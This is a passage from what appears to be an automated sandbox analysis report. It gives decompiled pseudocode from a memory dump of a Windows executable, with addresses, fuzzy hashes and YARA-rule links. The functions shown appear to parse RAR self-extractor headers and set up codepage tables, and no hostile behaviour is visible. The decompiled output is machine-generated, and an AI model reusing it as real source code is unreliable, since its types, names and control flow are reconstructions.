				signed int _t110;
				signed int _t112;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t138;
				intOrPtr _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				void* _t159;
				void* _t160;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t175;
				void* _t176;
				signed int _t178;
				char* _t190;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr* _t199;
				signed int _t202;
				void* _t204;
				char* _t205;
				intOrPtr _t206;
				void* _t207;

				_t197 = __edx;
				_t169 = __ecx;
				E0020D870(E00221451, _t207);
				_t199 = _t169;
				_push(7);
				_t164 = _t199 + 0x21f8;
				_push(_t199 + 0x21f8);
				 *((char*)(_t199 + 0x6cbc)) = 0;
				 *((char*)(_t199 + 0x6cc4)) = 0;
				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
					_t106 = E001F1D09(_t164, 7);
					__eflags = _t106;
					if(_t106 == 0) {
						E001F6ED7(_t207 - 0x38, "@."");
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
						_t197 =  *_t199;
						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
						_t175 = _t110;
						_t202 = 0;
						 *(_t207 - 0x14) = _t175;
						_t166 = 1;
						__eflags = _t175;
						if(_t175 <= 0) {
							L22:
							__eflags =  *(_t199 + 0x6cc0);
							_t176 = _t207 - 0x38;
							if( *(_t199 + 0x6cc0) != 0) {
								_t37 = _t207 - 4; // executed
								 *_t37 =  *(_t207 - 4) | 0xffffffff;
								__eflags =  *_t37;
								E001F159C(_t176); // executed
								L25:
								_t112 =  *(_t199 + 0x6cb0);
								__eflags = _t112 - 4;
								if(__eflags != 0) {
									__eflags = _t112 - 3;
									if(_t112 != 3) {
										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
										L32:
										 *((char*)(_t207 - 0xd)) = 0;
										__eflags = E001F391A(_t199, _t197);
										 *(_t207 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t116 =  *((intOrPtr*)(_t207 - 0xd));
											L39:
											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
											__eflags = _t178;
											if(_t178 == 0) {
												L41:
												__eflags =  *((char*)(_t199 + 0x6cc4));
												if( *((char*)(_t199 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t178;
													if(__eflags == 0) {
														E001F134C(__eflags, 0x1b, _t199 + 0x1e);
													}
													__eflags =  *((char*)(_t207 + 8));
													if( *((char*)(_t207 + 8)) != 0) {
														L48:
														__eflags =  *(_t207 - 0xe);
														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
														if( *(_t207 - 0xe) == 0) {
															L69:
															__eflags =  *((char*)(_t199 + 0x6cb5));
															if( *((char*)(_t199 + 0x6cb5)) == 0) {
																L71:
																E001FFAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
																L72:
																_t119 = _t166;
																goto L73;
															}
															__eflags =  *((char*)(_t199 + 0x6cb9));
															if( *((char*)(_t199 + 0x6cb9)) == 0) {
																goto L72;
															}
															goto L71;
														}
														__eflags =  *((char*)(_t199 + 0x21e0));
														if( *((char*)(_t199 + 0x21e0)) == 0) {
															L51:
															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
															while(1) {
																_t127 = E001F391A(_t199, _t197);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t199 + 0x6cb5));
																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
																			L66:
																			_t129 = 0;
																			__eflags = 0;
																			L67:
																			 *((char*)(_t199 + 0x6cb9)) = _t129;
																			L68:
																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
																			goto L69;
																		}
																		__eflags =  *((char*)(_t199 + 0x3318));
																		if( *((char*)(_t199 + 0x3318)) != 0) {
																			goto L66;
																		}
																		_t129 = _t166;
																		goto L67;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L68;
																	}
																	L60:
																	E001F1E3B(_t199);
																	continue;
																}
																__eflags =  *((char*)(_t199 + 0x6cb5));
																if( *((char*)(_t199 + 0x6cb5)) == 0) {
																	L56:
																	_t138 = 0;
																	__eflags = 0;
																	L57:
																	 *((char*)(_t199 + 0x6cb9)) = _t138;
																	goto L60;
																}
																__eflags =  *((char*)(_t199 + 0x5668));
																if( *((char*)(_t199 + 0x5668)) != 0) {
																	goto L56;
																}
																_t138 = _t166;
																goto L57;
															}
															goto L68;
														}
														__eflags =  *((char*)(_t199 + 0x6cbc));
														if( *((char*)(_t199 + 0x6cbc)) != 0) {
															goto L69;
														}
														goto L51;
													} else {
														L46:
														_t119 = 0;
														L73:
														L74:
														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
														return _t119;
													}
												}
												__eflags = _t116;
												if(_t116 != 0) {
													goto L48;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t207 + 8));
											if( *((char*)(_t207 + 8)) == 0) {
												goto L46;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t207 - 0xd)) = 0;
										while(1) {
											E001F1E3B(_t199);
											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
											__eflags = _t143 - _t166;
											if(_t143 == _t166) {
												break;
											}
											__eflags =  *((char*)(_t199 + 0x21e0));
											if( *((char*)(_t199 + 0x21e0)) == 0) {
												L37:
												_t144 = E001F391A(_t199, _t197);
												__eflags = _t144;
												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
												 *(_t207 - 0xe) = _t145;
												__eflags = _t145 - 1;
												if(_t145 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t143 - 4;
											if(_t143 == 4) {
												break;
											}
											goto L37;
										}
										_t116 = _t166;
										goto L39;
									}
									_t205 = _t199 + 0x21ff;
									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
									__eflags = _t147 - _t166;
									if(_t147 != _t166) {
										goto L46;
									}
									__eflags =  *_t205;
									if( *_t205 != 0) {
										goto L46;
									}
									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
									goto L32;
								}
								E001F134C(__eflags, 0x3c, _t199 + 0x1e);
								goto L46;
							}
							E001F159C(_t176);
							goto L46;
						} else {
							goto L6;
						}
						do {
							L6:
							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
							__eflags =  *_t190 - 0x52;
							if( *_t190 != 0x52) {
								goto L17;
							}
							_t152 = E001F1D09(_t190, _t110 - _t202);
							__eflags = _t152;
							if(_t152 == 0) {
								L16:
								_t110 =  *(_t207 - 0x14);
								goto L17;
							}
							_t191 =  *((intOrPtr*)(_t207 - 0x18));
							 *(_t199 + 0x6cb0) = _t152;
							__eflags = _t152 - _t166;
							if(_t152 != _t166) {
								L19:
								_t197 =  *_t199;
								_t153 = _t202 + _t191;
								 *(_t199 + 0x6cc0) = _t153;
								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
								_t155 =  *(_t199 + 0x6cb0);
								__eflags = _t155 - 2;
								if(_t155 == 2) {
									L21:
									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
									goto L22;
								}
								__eflags = _t155 - 3;
								if(_t155 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t202;
							if(_t202 <= 0) {
								goto L19;
							}
							__eflags = _t191 - 0x1c;
							if(_t191 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t207 - 0x14) - 0x1f;
							if( *(_t207 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
							if( *((char*)(_t159 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
							if( *((char*)(_t159 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
							if( *((char*)(_t159 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
							if( *((char*)(_t159 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t202 = _t202 + 1;
							__eflags = _t202 - _t110;
						} while (_t202 < _t110);
						goto L22;
					}
					 *(_t199 + 0x6cb0) = _t106;
					_t166 = 1;
					__eflags = _t106 - 1;
					if(_t106 == 1) {
						_t206 =  *_t199;
						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
						asm("sbb edx, 0x0");
						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
					}
					goto L25;
				}
				_t119 = 0;
				goto L74;
			}




































          0x001f1973
          0x001f1973
          0x001f1978
          0x001f1982
          0x001f1984
          0x001f1988
          0x001f198e
          0x001f198f
          0x001f1996
          0x001f19a3
          0x001f19ac
          0x001f19b7
          0x001f19bc
          0x001f19be
          0x001f19f4
          0x001f19fd
          0x001f1a01
          0x001f1a07
          0x001f1a12
          0x001f1a15
          0x001f1a1a
          0x001f1a1c
          0x001f1a1e
          0x001f1a21
          0x001f1a22
          0x001f1a24
          0x001f1ab9
          0x001f1ab9
          0x001f1ac0
          0x001f1ac3
          0x001f1acf
          0x001f1acf
          0x001f1acf
          0x001f1ad3
          0x001f1ad8
          0x001f1ad8
          0x001f1ade
          0x001f1ae1
          0x001f1af3
          0x001f1af6
          0x001f1b24
          0x001f1b2e
          0x001f1b32
          0x001f1b3a
          0x001f1b3f
          0x001f1b42
          0x001f1b44
          0x001f1b7d
          0x001f1b7d
          0x001f1b80
          0x001f1b80
          0x001f1b86
          0x001f1b88
          0x001f1b90
          0x001f1b90
          0x001f1b97
          0x001f1b9d
          0x001f1b9d
          0x001f1b9f
          0x001f1ba7
          0x001f1ba7
          0x001f1bac
          0x001f1bb0
          0x001f1bbd
          0x001f1bbd
          0x001f1bc7
          0x001f1bcd
          0x001f1cc5
          0x001f1cc5
          0x001f1ccc
          0x001f1cd7
          0x001f1ce7
          0x001f1cec
          0x001f1cec
          0x00000000
          0x001f1cec
          0x001f1cce
          0x001f1cd5
          0x00000000
          0x00000000
          0x00000000
          0x001f1cd5
          0x001f1bd3
          0x001f1bda
          0x001f1be9
          0x001f1bf0
          0x001f1bf2
          0x001f1bfb
          0x001f1c04
          0x001f1c0d
          0x001f1c16
          0x001f1c1f
          0x001f1c60
          0x001f1c62
          0x001f1c67
          0x001f1c69
          0x00000000
          0x00000000
          0x001f1c24
          0x001f1c2a
          0x001f1c2d
          0x001f1c4f
          0x001f1c52
          0x001f1c6d
          0x001f1c74
          0x001f1c83
          0x001f1c83
          0x001f1c83
          0x001f1c85
          0x001f1c85
          0x001f1c8b
          0x001f1c90
          0x001f1c99
          0x001f1ca2
          0x001f1cab
          0x001f1cb9
          0x001f1cc2
          0x00000000
          0x001f1cc2
          0x001f1c76
          0x001f1c7d
          0x00000000
          0x00000000
          0x001f1c7f
          0x00000000
          0x001f1c7f
          0x001f1c54
          0x001f1c57
          0x00000000
          0x00000000
          0x001f1c59
          0x001f1c5b
          0x00000000
          0x001f1c5b
          0x001f1c2f
          0x001f1c36
          0x001f1c45
          0x001f1c45
          0x001f1c45
          0x001f1c47
          0x001f1c47
          0x00000000
          0x001f1c47
          0x001f1c38
          0x001f1c3f
          0x00000000
          0x00000000
          0x001f1c41
          0x00000000
          0x001f1c41
          0x00000000
          0x001f1c6b
          0x001f1bdc
          0x001f1be3
          0x00000000
          0x00000000
          0x00000000
          0x001f1bb2
          0x001f1bb2
          0x001f1bb2
          0x001f1cee
          0x001f1cef
          0x001f1cf4
          0x001f1cfe
          0x001f1cfe
          0x001f1bb0
          0x001f1b99
          0x001f1b9b
          0x00000000
          0x00000000
          0x00000000
          0x001f1b9b
          0x001f1b8a
          0x001f1b8e
          0x00000000
          0x00000000
          0x00000000
          0x001f1b8e
          0x001f1b46
          0x001f1b48
          0x001f1b4b
          0x001f1b4d
          0x001f1b52
          0x001f1b58
          0x001f1b5a
          0x00000000
          0x00000000
          0x001f1b5c
          0x001f1b63
          0x001f1b6a
          0x001f1b6c
          0x001f1b71
          0x001f1b73
          0x001f1b76
          0x001f1b79
          0x001f1b7b
          0x00000000
          0x00000000
          0x00000000
          0x001f1b7b
          0x001f1b65
          0x001f1b68
          0x00000000
          0x00000000
          0x00000000
          0x001f1b68
          0x001f1bb9
          0x00000000
          0x001f1bb9
          0x001f1afa
          0x001f1b04
          0x001f1b07
          0x001f1b09
          0x00000000
          0x00000000
          0x001f1b0f
          0x001f1b12
          0x00000000
          0x00000000
          0x001f1b18
          0x00000000
          0x001f1b18
          0x001f1ae9
          0x00000000
          0x001f1ae9
          0x001f1ac5
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001f1a2a
          0x001f1a2a
          0x001f1a2d
          0x001f1a2f
          0x001f1a32
          0x00000000
          0x00000000
          0x001f1a38
          0x001f1a3d
          0x001f1a3f
          0x001f1a7a
          0x001f1a7a
          0x00000000
          0x001f1a7a
          0x001f1a41
          0x001f1a44
          0x001f1a4a
          0x001f1a4c
          0x001f1a84
          0x001f1a84
          0x001f1a86
          0x001f1a90
          0x001f1a96
          0x001f1a99
          0x001f1a9f
          0x001f1aa2
          0x001f1aa9
          0x001f1ab6
          0x00000000
          0x001f1ab6
          0x001f1aa4
          0x001f1aa7
          0x00000000
          0x00000000
          0x00000000
          0x001f1aa7
          0x001f1a4e
          0x001f1a50
          0x00000000
          0x00000000
          0x001f1a52
          0x001f1a55
          0x00000000
          0x00000000
          0x001f1a57
          0x001f1a5b
          0x00000000
          0x00000000
          0x001f1a60
          0x001f1a62
          0x001f1a66
          0x00000000
          0x00000000
          0x001f1a68
          0x001f1a6c
          0x00000000
          0x00000000
          0x001f1a6e
          0x001f1a72
          0x00000000
          0x00000000
          0x001f1a74
          0x001f1a78
          0x00000000
          0x00000000
          0x00000000
          0x001f1a7d
          0x001f1a7d
          0x001f1a7e
          0x001f1a7e
          0x00000000
          0x001f1a82
          0x001f19c2
          0x001f19c8
          0x001f19c9
          0x001f19cb
          0x001f19d1
          0x001f19d7
          0x001f19df
          0x001f19e4
          0x001f19e4
          0x00000000
          0x001f19cb
          0x001f19a5
          0x00000000

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID: @."
          • API String ID: 3519838083-1371282458
          • Opcode ID: 753c990834148efcffb4777db195934c91adb79827cf9f1ff00661f2fa639f30
          • Instruction ID: 775994ecd5b461f96077fd29ec300150c9b7f5847754f712827c3d1c3dec45ee
          • Opcode Fuzzy Hash: 753c990834148efcffb4777db195934c91adb79827cf9f1ff00661f2fa639f30
          • Instruction Fuzzy Hash: DFB1F270B0068AFFEB29CF78C484BB9FBE5BF15314F180259E65983281D730A964CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F399D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON
          Download Yara Rule
          C-Code - Quality: 93%
          			E001F399D(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E0020D870(E002211BE, _t153);
				E0020D940();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E001F134C(__eflags, 0x1e, _t151 + 0x1e);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E001FC5C9(_t83, _t120);
						_push(_t120);
						E002014DE(_t153 - 0xe6ec, __eflags);
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00202842(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E001FA728(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E001FC67C(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E002024D9(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E001F910B(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E001FA6F6(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E001F6BF5(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
									E001F6E03(0x2300e0, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E001FFBBB(_t148);
									}
								}
								L25:
								E002016CB(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E001FC634(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E001F1EDE(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E001FC699(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E001F134C(__eflags, 0x1e, _t151 + 0x1e);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E001F134C(_t156, 0x1d, _t151 + 0x1e);
					E001F6E03(0x2300e0, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

















          0x001f399d
          0x001f399d
          0x001f39a2
          0x001f39ac
          0x001f39b2
          0x001f39b4
          0x001f39bb
          0x001f39d9
          0x001f39e0
          0x001f3c22
          0x001f3c28
          0x00000000
          0x001f3c28
          0x001f39e8
          0x001f39f9
          0x001f39ff
          0x00000000
          0x00000000
          0x001f3a0b
          0x001f3a0b
          0x001f3a11
          0x001f3a22
          0x001f3a23
          0x001f3a2c
          0x001f3a31
          0x001f3a38
          0x001f3a3d
          0x001f3a4c
          0x001f3a4f
          0x001f3a54
          0x001f3a57
          0x001f3a5a
          0x001f3aaf
          0x001f3aaf
          0x001f3ab5
          0x001f3b11
          0x001f3b1f
          0x001f3b33
          0x001f3b40
          0x001f3b46
          0x001f3b4c
          0x001f3b54
          0x001f3b5a
          0x001f3b66
          0x001f3b72
          0x001f3b75
          0x001f3b78
          0x001f3b7e
          0x001f3b84
          0x001f3b8a
          0x001f3b90
          0x001f3b96
          0x001f3b9c
          0x001f3bb5
          0x001f3b9e
          0x001f3b9e
          0x001f3b9f
          0x001f3ba0
          0x001f3ba1
          0x001f3ba1
          0x001f3bcf
          0x001f3bd1
          0x001f3be0
          0x001f3be2
          0x001f3c0f
          0x001f3be4
          0x001f3bf1
          0x001f3bfd
          0x001f3c02
          0x001f3c04
          0x001f3c08
          0x001f3c08
          0x001f3c04
          0x001f3c11
          0x001f3c17
          0x001f3c1d
          0x00000000
          0x001f3c1f
          0x001f3ab7
          0x001f3abd
          0x001f3ac3
          0x00000000
          0x00000000
          0x001f3aec
          0x001f3af5
          0x001f3af5
          0x001f3b0c
          0x00000000
          0x001f3b0c
          0x001f3a5c
          0x001f3a62
          0x001f3a82
          0x001f3a82
          0x001f3a84
          0x001f3a97
          0x001f3aaa
          0x001f3a86
          0x001f3a86
          0x001f3a86
          0x00000000
          0x001f3a84
          0x001f3a64
          0x001f3a72
          0x001f3a78
          0x00000000
          0x001f3a78
          0x001f3a66
          0x001f3a70
          0x00000000
          0x00000000
          0x00000000
          0x001f3a70
          0x001f3a13
          0x001f3a19
          0x00000000
          0x001f3a1b
          0x001f3a1b
          0x00000000
          0x001f3a1b
          0x001f39bd
          0x001f39c3
          0x001f39cf
          0x001f3c2d
          0x001f3c2d
          0x001f3c2f
          0x001f3c33
          0x001f3c3d
          0x001f3c3d

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID: CMT
          • API String ID: 3519838083-2756464174
          • Opcode ID: 347a4ac2a577b978bdad4ed3bd492046a5910375a4875929898c17fe4bc37092
          • Instruction ID: 32a3617eded7e202fdd7f63c004baa11e16d6a62e1bccf839d0331420b41afe7
          • Opcode Fuzzy Hash: 347a4ac2a577b978bdad4ed3bd492046a5910375a4875929898c17fe4bc37092
          • Instruction Fuzzy Hash: 6071BE71504B48AEDB25DB30CC51AFBB7E8AF24301F44496EE6AB87142DB326A48DF10
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021A51E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0021A51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;
				char* _t95;
				intOrPtr _t99;
				signed int _t100;

				_t93 = __edx;
				_t63 =  *0x22d668; // 0x4319796a
				_v8 = _t63 ^ _t100;
				_t99 = _a4;
				_t4 = _t99 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t99 + 0x119; // 0x21ab69
					_t94 = _t47;
					_t88 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t94;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t95 = _t94 + _t88;
						_t69 = _t68 + _t95;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t95 = 0;
							} else {
								_t72 = _t99 + _t88;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t88 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
							_t54 = _t88 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t95 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t99 + 0x119; // 0x21ab69
						_t94 = _t61;
						_t88 = _t88 + 1;
						__eflags = _t88 - 0x100;
					} while (_t88 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t91 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t106 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t91 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t91 = _t91 + 2;
						__eflags = _t91;
						_t75 =  *_t91;
					}
					_t13 = _t99 + 4; // 0x5efc4d8b
					E0021B5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t99 + 4; // 0x5efc4d8b
					_t19 = _t99 + 0x21c; // 0x2ebf88b
					E002197C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t99 + 4; // 0x5efc4d8b
					_t23 = _t99 + 0x21c; // 0x2ebf88b
					E002197C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t92 = 0;
					do {
